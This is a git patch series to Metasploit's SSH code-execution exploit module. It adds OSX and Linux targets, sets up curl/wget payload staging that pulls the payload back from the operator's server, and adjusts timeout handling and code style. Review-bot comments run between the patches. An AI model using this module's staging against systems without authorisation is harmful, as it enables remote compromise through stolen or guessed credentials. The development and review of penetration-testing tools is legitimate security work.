From 3b2a0be20043267f66e386dcc7e02330e2cbeb6f Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 30 Nov 2017 14:42:14 -0600 Subject: [PATCH 1/7] First swing at osx x64 meterpreter support --- modules/exploits/multi/ssh/sshexec.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 5c4fb8149cbe..a160c91252a3 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -35,11 +35,12 @@ def initialize }, 'Payload' => { - 'Space' => 4096, + 'Space' => 800000, 'BadChars' => "", 'DisableNops' => true }, 'Platform' => %w{ linux osx python }, + 'CmdStagerFlavor' => %w{ bourne echo printf curl wget }, 'Targets' => [ [ 'Linux x86', @@ -60,6 +61,13 @@ def initialize 'Platform' => 'osx' } ], + [ 'OSX x64', + { + 'Arch' => ARCH_X64, + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w{curl wget} + } + ], [ 'Python', { 'Arch' => ARCH_PYTHON, @@ -67,7 +75,6 @@ def initialize } ] ], - 'CmdStagerFlavor' => %w{ bourne echo printf }, 'DefaultTarget' => 0, # For the CVE 'DisclosureDate' => 'Jan 01 1999' @@ -77,7 +84,7 @@ def initialize [ OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]), - OptString.new('RHOST', [ true, "The target address" ]), + Opt::RHOST('RHOST', [ true, "The target address" ]), Opt::RPORT(22) ], self.class ) From e3dc17dd9288c13c9473ce9c77aeb4e71044834e Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 30 Nov 2017 16:16:34 -0600 Subject: [PATCH 2/7] Add some extra targets --- modules/exploits/multi/ssh/sshexec.rb | 35 ++++++++++++++++++++++++--- 1 file changed, 31 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index a160c91252a3..15e2767eea9e 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb 
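Review bot: `'Space' => 800000` in the first hunk is only sensible for the pull-style flavours, yet the module-level `'CmdStagerFlavor'` added two lines below still lists `bourne echo printf` ahead of `curl wget`; if `execute_cmdstager(linemax: 500)` later in this file issues one `execute_command` per generated line, as the CmdStager mixin does, a payload anywhere near that limit becomes thousands of separate SSH exec channels on any target that does not override the list. Either pair the large `Space` with a much larger `linemax` for the SSH transport (there is no URL or argv limit to respect here) or document the trade-off where the number is set: `# Space sized for curl/wget staging; echo/printf push ~linemax bytes per SSH exec`. `initialize` starts before this hunk.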
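Review bot: The new `OSX x64` target in the second hunk restricts staging to `%w{curl wget}`, which — if these flavours behave like the rest of the CmdStager mixin — means the target must open an outbound HTTP connection back to the module's SRVHOST/SRVPORT instead of receiving the binary through the already-authenticated SSH channel, and neither the target entry nor the description says so. Stock macOS ships curl but not wget, so the ordering is right, but an operator picking this target on an egress-filtered host gets a silent failure. A one-line comment on the target would cover it: `# curl/wget fetch the payload over HTTP from the module's web server; target needs egress to SRVHOST:SRVPORT`. `initialize` starts before this hunk.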
@@ -40,7 +40,7 @@ def initialize 'DisableNops' => true }, 'Platform' => %w{ linux osx python }, - 'CmdStagerFlavor' => %w{ bourne echo printf curl wget }, + 'CmdStagerFlavor' => %w{ bourne echo printf wget }, 'Targets' => [ [ 'Linux x86', @@ -55,11 +55,38 @@ def initialize 'Platform' => 'linux' } ], + [ 'Linux armle', + { + 'Arch' => ARCH_ARMLE, + 'Platform' => 'linux' + } + ], + [ 'Linux mipsle', + { + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w{curl wget} + } + ], + [ 'Linux mipsbe', + { + 'Arch' => ARCH_MIPSBE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w{ wget } + } + ], + [ 'Linux aarch64', + { + 'Arch' => ARCH_AARCH64, + 'Platform' => 'linux' + } + ], [ 'OSX x86', { 'Arch' => ARCH_X86, - 'Platform' => 'osx' - } + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w{curl wget} + } ], [ 'OSX x64', { @@ -139,8 +166,8 @@ def do_login(ip, user, pass, port) end def exploit + execute_command('uname -a') do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT']) - print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...") if target['Platform'] == 'python' execute_command("python -c \"#{payload.encoded}\"") From 6752770695c0aed968e97031fcd2347dc8800e5a Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 30 Nov 2017 20:45:11 -0600 Subject: [PATCH 3/7] Shut up rubocop --- modules/exploits/multi/ssh/sshexec.rb | 79 +++++++++++++++------------ 1 file changed, 44 insertions(+), 35 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 15e2767eea9e..da8715e16070 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb 
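Review bot: The per-target flavour lists in the second hunk are inconsistent without explanation: `Linux mipsle` allows `curl wget`, `Linux mipsbe` only `wget`, and `Linux armle`/`Linux aarch64` inherit the module-level `bourne echo printf wget`, so on those two an 800000-byte payload is pushed with echo/printf one `linemax` chunk per SSH exec. If the asymmetry reflects what was available on the devices tested (for example no curl on the MIPS big-endian box), record it next to the entry, e.g. `# tested on <device>: curl absent, wget only`, and otherwise make the four Linux entries match. `initialize` begins and ends outside this hunk.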
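Review bot: In the last hunk `execute_command('uname -a')` is called before `do_login`, so `self.ssh_socket` is still nil at that point; the call can only "succeed" because `execute_command` rescues everything (the `rescue ::Exception` is visible in a later patch of this series), and its output is discarded anyway, while the removed `print_status(... Sending stager...)` was the only progress message the operator had. If the intent is to sanity-check the remote architecture before staging, do it after the login and compare against the selected target, roughly `arch = ssh_socket.exec!("uname -m\n").to_s.strip` followed by `fail_with(Failure::BadConfig, "remote arch #{arch} does not match target") unless arch_matches?(arch)`, rather than a fire-and-forget command. `exploit` continues past the end of this hunk.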
@@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote def initialize super( 'Name' => 'SSH User Code Execution', - 'Description' => %q{ + 'Description' => %q( This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. - }, + ), 'Author' => ['Spencer McIntyre', 'Brandon Knight'], 'References' => [ @@ -39,63 +39,72 @@ def initialize 'BadChars' => "", 'DisableNops' => true }, - 'Platform' => %w{ linux osx python }, - 'CmdStagerFlavor' => %w{ bourne echo printf wget }, + 'Platform' => %w[linux osx python], + 'CmdStagerFlavor' => %w[bourne echo printf wget], 'Targets' => [ - [ 'Linux x86', + [ + 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux x64', + [ + 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], - [ 'Linux armle', + [ + 'Linux armle', { 'Arch' => ARCH_ARMLE, 'Platform' => 'linux' } ], - [ 'Linux mipsle', + [ + 'Linux mipsle', { - 'Arch' => ARCH_MIPSLE, - 'Platform' => 'linux', - 'CmdStagerFlavor' => %w{curl wget} + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w[curl wget] } ], - [ 'Linux mipsbe', + [ + 'Linux mipsbe', { - 'Arch' => ARCH_MIPSBE, - 'Platform' => 'linux', - 'CmdStagerFlavor' => %w{ wget } + 'Arch' => ARCH_MIPSBE, + 'Platform' => 'linux', + 'CmdStagerFlavor' => %w[wget] } ], - [ 'Linux aarch64', + [ + 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], - [ 'OSX x86', + [ + 'OSX x86', { - 'Arch' => ARCH_X86, - 'Platform' => 'osx', - 'CmdStagerFlavor' => %w{curl wget} - } + 'Arch' => ARCH_X86, + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w[curl wget] + } ], - [ 'OSX x64', + [ + 'OSX x64', { - 'Arch' => ARCH_X64, - 'Platform' => 'osx', - 'CmdStagerFlavor' => %w{curl wget} + 'Arch' => ARCH_X64, + 'Platform' => 'osx', + 'CmdStagerFlavor' => %w[curl wget] } ], - [ 'Python', + [ + 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' 
@@ -136,16 +145,16 @@ def execute_command(cmd, opts = {}) def do_login(ip, user, pass, port) factory = ssh_socket_factory opt_hash = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => port, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true + auth_methods: ['password', 'keyboard-interactive'], + port: port, + use_agent: false, + config: false, + password: pass, + proxy: factory, + non_interactive: true } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) @@ -172,7 +181,7 @@ def exploit if target['Platform'] == 'python' execute_command("python -c \"#{payload.encoded}\"") else - execute_cmdstager({:linemax => 500}) + execute_cmdstager(linemax: 500) end self.ssh_socket.close From d1d8e3a678e7981bfc3733259878d2aea65b0e2e Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Fri, 1 Dec 2017 10:58:18 -0600 Subject: [PATCH 4/7] Let's not rescue everything..... --- modules/exploits/multi/ssh/sshexec.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index da8715e16070..cc4601d19e94 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -135,10 +135,12 @@ def initialize def execute_command(cmd, opts = {}) vprint_status("Executing #{cmd}") begin - Timeout.timeout(3) do + Timeout.timeout(5) do self.ssh_socket.exec!("#{cmd}\n") end - rescue ::Exception + rescue Timeout::Error + print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.") + print_good("You will likely still get a shell; run sessions -l to be sure.") end end 
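Review bot: The `opt_hash` in the first hunk sets `use_agent: false` and `config: false` but no host-key policy, so Net::SSH's default applies; depending on the net-ssh version that default (`paranoid` or `verify_host_key`) reads and appends to the operator's `~/.ssh/known_hosts` and raises on a mismatch when a target has been re-imaged, and whether the `rescue` after `Net::SSH.start` (outside this hunk) catches that is not visible here. For an exploit module the policy should be explicit, e.g. `verify_host_key: :never` (or `paranoid: false` on older net-ssh) alongside `non_interactive: true`, with a comment noting that known_hosts is deliberately not consulted or written. `do_login` continues past this hunk.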
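Review bot: The context line `execute_command("python -c \"#{payload.encoded}\"")` in the second hunk interpolates the encoded Python payload inside a double-quoted remote shell string, so any `"`, `$`, backtick or backslash in `payload.encoded` is expanded by the target's shell before python sees it; this is only safe if the Python encoder is guaranteed to emit a quote-free wrapper, which nothing here establishes. It also assumes a `python` binary on PATH, which is not a given on macOS or newer distributions. Consider shipping it base64-encoded and decoding on the target (`echo <b64> | base64 -d | python`) or at least adding `# assumes payload.encoded contains no shell metacharacters` above the call. `exploit` starts before this hunk.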
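Review bot: In the `execute_command` hunk the new `rescue Timeout::Error` swallows the timeout and then emits `print_good("You will likely still get a shell...")`, asserting a result the method never observed; `execute_command` returns nil on both the timed-out and the completed path, so the cmdstager loop cannot tell a hung command from a finished one. Since the timeout is expected only when the staged payload keeps the exec channel open, demote the message to a warning that says what happened rather than what to believe, e.g. `print_warning("command did not return within 5s; if this was the final stager line, check 'sessions -l'")`. Narrowing from `::Exception` to `Timeout::Error` is the right direction, but any other error from `exec!` now propagates out with the SSH socket still open; the `self.ssh_socket.close` in `exploit` (outside this hunk) does not appear to sit in an `ensure`.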
@@ -175,7 +177,6 @@ def do_login(ip, user, pass, port) end def exploit - execute_command('uname -a') do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT']) print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...") if target['Platform'] == 'python' From 4ca595eb1569e1007e48a7296feb93972c1dfb99 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 5 Dec 2017 11:55:17 -0600 Subject: [PATCH 5/7] wvu-suggested fix --- modules/exploits/multi/ssh/sshexec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index cc4601d19e94..ab9bb533caa0 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -120,7 +120,7 @@ def initialize [ OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]), - Opt::RHOST('RHOST', [ true, "The target address" ]), + Opt::RHOST(), Opt::RPORT(22) ], self.class ) @@ -156,7 +156,7 @@ def do_login(ip, user, pass, port) non_interactive: true } - opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] + opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG']) begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) From f439edfa1a1cd24246c79fa382df6e5072a53612 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 17 Jan 2018 08:18:26 -0600 Subject: [PATCH 6/7] Fixes by the fabled wvu --- modules/exploits/multi/ssh/sshexec.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index ab9bb533caa0..ccb8a6433fbb 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb 
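Review bot: In the second hunk of this patch, `opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG'])` puts parentheses back around a modifier condition that the rubocop pass earlier in this series removed; Ruby style (rubocop's Style/ParenthesesAroundCondition) omits them, so the linter will flag this line again. Keep `opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']`. `do_login` begins and ends outside this hunk.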
@@ -134,14 +134,7 @@ def initialize def execute_command(cmd, opts = {}) vprint_status("Executing #{cmd}") - begin - Timeout.timeout(5) do - self.ssh_socket.exec!("#{cmd}\n") - end - rescue Timeout::Error - print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.") - print_good("You will likely still get a shell; run sessions -l to be sure.") - end + self.ssh_socket.exec!("#{cmd}\n") end def do_login(ip, user, pass, port) @@ -155,8 +148,9 @@ def do_login(ip, user, pass, port) proxy: factory, non_interactive: true } - - opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG']) + if (datastore['SSH_DEBUG']) + opt_hash[:verbose] = :debug + end begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) From 4c11eae7742f9ae81a2ca27344ec46fc1ca046fc Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 17 Jan 2018 13:21:36 -0600 Subject: [PATCH 7/7] Maybe that timeout is needed..... --- modules/exploits/multi/ssh/sshexec.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index ccb8a6433fbb..ab9bb533caa0 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -134,7 +134,14 @@ def initialize def execute_command(cmd, opts = {}) vprint_status("Executing #{cmd}") - self.ssh_socket.exec!("#{cmd}\n") + begin + Timeout.timeout(5) do + self.ssh_socket.exec!("#{cmd}\n") + end + rescue Timeout::Error + print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.") + print_good("You will likely still get a shell; run sessions -l to be sure.") + end end def do_login(ip, user, pass, port) @@ -148,9 +155,8 @@ def do_login(ip, user, pass, port) proxy: factory, non_interactive: true } - if (datastore['SSH_DEBUG']) - opt_hash[:verbose] = :debug - end + + opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG']) begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
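Review bot: Re-adding `Timeout.timeout(5)` around `ssh_socket.exec!` in the third hunk restores a workaround for the symptom rather than the cause: `Timeout` raises asynchronously into a thread that is inside net-ssh's event loop, which may leave the session in an undefined state for the `ssh_socket.close` that follows in `exploit`, and it caps every staged command at 5 s regardless of link speed. `exec!` only hangs because the final stager line runs the payload in the foreground; detaching it on the target (appending `&` via `nohup`/`setsid`, or the mixin's background option if it offers one) lets `exec!` return normally and the timeout can go back to being an error. If the timeout stays, say why at the `begin`: `# exec! blocks while the staged payload holds the channel open; a timeout here is expected, not fatal`. `execute_command` is fully inside the hunk; `do_login` in the next hunk is not.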